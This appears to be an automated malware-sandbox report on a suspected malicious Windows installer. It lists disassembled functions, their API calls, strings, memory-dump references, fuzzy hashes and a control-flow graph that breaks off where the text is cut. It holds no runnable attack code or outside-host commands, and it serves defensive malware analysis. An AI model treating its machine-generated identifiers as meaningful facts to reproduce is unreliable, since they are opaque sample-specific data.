                                                                                                                                                                                • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                                                                                                                                                                • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                                                                                                                                                                • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                                                                                                                                                                Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A0D
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error launching installer, xrefs: 004059EA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                                                                                                                                • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                                                                                                                                                                • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                                                                                                                                • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                                                                                                                                                                Function 00403A28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F43420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                                                                                                                                                                • GlobalFree.KERNEL32(00B3DCE8), ref: 00403A49
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                                                                                                                                • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                                                                                                                                • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                                                                                                                                                                Function 00405D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\02Eh1ah35H.exe,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\02Eh1ah35H.exe,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                                • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                                                                                                                                                                • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                                                                                                                                                                Function 6FDF10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FDF116A
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF11C7
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF11D9
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1203
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                • Opcode ID: cb66843cc73f2ca024eb3f4eabef0c613ad6003faf216bbc09b7b108ede6c6d0
                                                                                                                                                                                • Instruction ID: a20fddbad3b80d041edb03ae310d726f6a471b3388103de1b76934ca42f9f458
                                                                                                                                                                                • Opcode Fuzzy Hash: cb66843cc73f2ca024eb3f4eabef0c613ad6003faf216bbc09b7b108ede6c6d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E3192F6903701DFEB408FB8E945E657BE8FB46324B0A461AE844D7250E734F9529760
                                                                                                                                                                                Function 00405E49 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:0%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                Total number of Nodes:1
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 59152 33372b90 LdrInitializeThunk

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 333734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 4 333734e0-333734ec LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: e85343e005927d33794c21f3858b45066f9d3944e5c38fc9b5efd7c1fccc03ae
                                                                                                                                                                                • Instruction ID: 89256e0359875c7968e40a68dc14a6fc617bc9d8b1b195cb90dfad76673fc5d9
                                                                                                                                                                                • Opcode Fuzzy Hash: e85343e005927d33794c21f3858b45066f9d3944e5c38fc9b5efd7c1fccc03ae
                                                                                                                                                                                • Instruction Fuzzy Hash: AA90023561610842D50066584614706100587D0203F61CC16A0414D28DC7A5895975A2
                                                                                                                                                                                Function 33372B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 33372b90-33372b9c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 14a541be96a05e3cc73b75f9db8b18a9514eaf3bd39f72aabd2d82e8227674aa
                                                                                                                                                                                • Instruction ID: e0a9ba194e23b6d40ad356a3fd9dd07b086402c730a2df8ae5ef4a7464217dc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 14a541be96a05e3cc73b75f9db8b18a9514eaf3bd39f72aabd2d82e8227674aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 6890023521208C42D5106658850474A000587D0303F55CC16A4414E18DC6A588997121
                                                                                                                                                                                Function 33372BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1 33372bc0-33372bcc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 6841672f677fb03bb6094480c2d676f90d78890a9996d325ee41cac69b64c465
                                                                                                                                                                                • Instruction ID: 2aa4bfde3eedea96f1e4a5f7a6f6190bcee2acd3249896adbe7189c1d82a338e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6841672f677fb03bb6094480c2d676f90d78890a9996d325ee41cac69b64c465
                                                                                                                                                                                • Instruction Fuzzy Hash: AD90023521200842D5006A985508646000587E0303F51D816A5014D15EC67588997131
                                                                                                                                                                                Function 33372EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 3 33372eb0-33372ebc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: e2ee9ac14c307d39e324b38ee4647063dfcf51f0c92b52f3121d4c9c94b82872
                                                                                                                                                                                • Instruction ID: a40695680166063c33baf03c1c3c2aadba8789449dee8ad46a025272af770f01
                                                                                                                                                                                • Opcode Fuzzy Hash: e2ee9ac14c307d39e324b38ee4647063dfcf51f0c92b52f3121d4c9c94b82872
                                                                                                                                                                                • Instruction Fuzzy Hash: 0990023521240842D5006658491470B000587D0303F51C816A1154D15DC63588597571
                                                                                                                                                                                Function 33372D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2 33372d10-33372d1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9c23f29512178caddf34440817f547ac8f2f1f2dcee38aa5f14819d6e23c7090
                                                                                                                                                                                • Instruction ID: 37730db6586e83d4a150e943b06a2039f50dc50b8cf10378242e8ec28b968864
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c23f29512178caddf34440817f547ac8f2f1f2dcee38aa5f14819d6e23c7090
                                                                                                                                                                                • Instruction Fuzzy Hash: 7190023521200853D51166584604707000987D0243F91CC17A0414D18DD666895AB121

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 333D9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 556 333d9060-333d90a9 557 333d90f8-333d9107 556->557 558 333d90ab-333d90b0 556->558 559 333d9109-333d910e 557->559 560 333d90b4-333d90ba 557->560 558->560 561 333d9893-333d98a7 call 33374b50 559->561 562 333d9215-333d923d call 33378f40 560->562 563 333d90c0-333d90e4 call 33378f40 560->563 572 333d925c-333d9292 562->572 573 333d923f-333d925a call 333d98aa 562->573 570 333d90e6-333d90f3 call 333f92ab 563->570 571 333d9113-333d91b4 GetPEB call 333dd7e5 563->571 582 333d91fd-333d9210 RtlDebugPrintTimes 570->582 583 333d91b6-333d91c4 571->583 584 333d91d2-333d91e7 571->584 577 333d9294-333d9296 572->577 573->577 577->561 581 333d929c-333d92b1 RtlDebugPrintTimes 577->581 581->561 591 333d92b7-333d92be 581->591 582->561 583->584 585 333d91c6-333d91cb 583->585 584->582 586 333d91e9-333d91ee 584->586 585->584 589 333d91f0 586->589 590 333d91f3-333d91f6 586->590 589->590 590->582 591->561 592 333d92c4-333d92df 591->592 593 333d92e3-333d92f4 call 333da388 592->593 596 333d92fa-333d92fc 593->596 597 333d9891 593->597 596->561 598 333d9302-333d9309 596->598 597->561 599 333d947c-333d9482 598->599 600 333d930f-333d9314 598->600 603 333d961c-333d9622 599->603 604 333d9488-333d94b7 call 33378f40 599->604 601 333d933c 600->601 602 333d9316-333d931c 600->602 606 333d9340-333d9391 call 33378f40 RtlDebugPrintTimes 601->606 602->601 605 333d931e-333d9332 602->605 608 333d9674-333d9679 603->608 609 333d9624-333d962d 603->609 618 333d94b9-333d94c4 604->618 619 333d94f0-333d9505 604->619 613 333d9338-333d933a 605->613 614 333d9334-333d9336 605->614 606->561 650 333d9397-333d939b 606->650 611 333d967f-333d9687 608->611 612 333d9728-333d9731 608->612 609->593 610 333d9633-333d966f call 33378f40 609->610 635 333d9869 610->635 621 333d9689-333d968d 611->621 622 333d9693-333d96bd call 333d8093 611->622 612->593 617 333d9737-333d973a 612->617 613->606 614->606 624 333d97fd-333d9834 call 33378f40 617->624 625 333d9740-333d978a 617->625 626 333d94cf-333d94ee 618->626 627 333d94c6-333d94cd 618->627 629 333d9507-333d9509 619->629 630 333d9511-333d9518 619->630 621->612 621->622 647 333d9888-333d988c 622->647 648 333d96c3-333d971e call 33378f40 RtlDebugPrintTimes 622->648 658 333d983b-333d9842 624->658 659 333d9836 624->659 632 333d978c 625->632 633 333d9791-333d979e 625->633 634 333d9559-333d9576 RtlDebugPrintTimes 626->634 627->626 636 333d950f 629->636 637 333d950b-333d950d 629->637 638 333d953d-333d953f 630->638 632->633 644 333d97aa-333d97ad 633->644 645 333d97a0-333d97a3 633->645 634->561 664 333d957c-333d959f call 33378f40 634->664 646 333d986d 635->646 636->630 637->630 642 333d951a-333d9524 638->642 643 333d9541-333d9557 638->643 655 333d952d 642->655 656 333d9526 642->656 643->634 653 333d97af-333d97b2 644->653 654 333d97b9-333d97fb 644->654 645->644 652 333d9871-333d9886 RtlDebugPrintTimes 646->652 647->593 648->561 689 333d9724 648->689 660 333d939d-333d93a5 650->660 661 333d93eb-333d9400 650->661 652->561 652->647 653->654 654->652 668 333d952f-333d9531 655->668 656->643 666 333d9528-333d952b 656->666 669 333d984d 658->669 670 333d9844-333d984b 658->670 659->658 662 333d93a7-333d93d0 call 333d8093 660->662 663 333d93d2-333d93e9 660->663 665 333d9406-333d9414 661->665 673 333d9418-333d946f call 33378f40 RtlDebugPrintTimes 662->673 663->665 686 333d95bd-333d95d8 664->686 687 333d95a1-333d95bb 664->687 665->673 666->668 675 333d953b 668->675 676 333d9533-333d9535 668->676 677 333d9851-333d9857 669->677 670->677 673->561 692 333d9475-333d9477 673->692 675->638 676->675 684 333d9537-333d9539 676->684 678 333d985e-333d9864 677->678 679 